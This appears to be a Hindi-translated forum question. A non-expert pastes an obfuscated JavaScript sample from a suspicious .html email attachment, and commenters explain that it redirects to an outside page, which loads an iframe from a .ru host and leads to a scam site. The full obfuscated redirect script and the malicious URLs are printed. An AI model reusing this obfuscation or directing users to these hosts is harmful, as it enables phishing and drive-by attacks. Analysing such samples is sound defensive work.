मेरे कुछ गैर-आईटी सहकर्मियों ने एक ईमेल संदेश में एक .html अटैचमेंट खोला जो बेहद संदिग्ध दिखता है। इसके परिणामस्वरूप एक खाली स्क्रीन दिखाई दी जब ऐसा लगता है कि कुछ जावास्क्रिप्ट कोड चलाया गया था।यह संदिग्ध फ़िशिंग कोड क्या करता है?
<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>
यह क्या किया? यह मेरे प्रोग्रामिंग ज्ञान के दायरे से बाहर है।
मुझे कोई सुझाव नहीं है कि कोई भी इस लिंक पर क्लिक करें। वह पृष्ठ http://onionfleet.ru:8080/index.php?pid=10 से एक आईफ्रेम लोड करता है, और http://mouselong.com पर रीडायरेक्ट करता है। भी ** इस टिप्पणी में दिए गए लिंक पर क्लिक न करें ** जब तक आप नहीं जानते कि आप क्या कर रहे हैं। – x1a4
जो बदले में कुछ घोटाले साइट से लिंक करने वाला आईफ्रेम होता है जो * इतनी प्रामाणिक नहीं है * जाहिर है ... – nico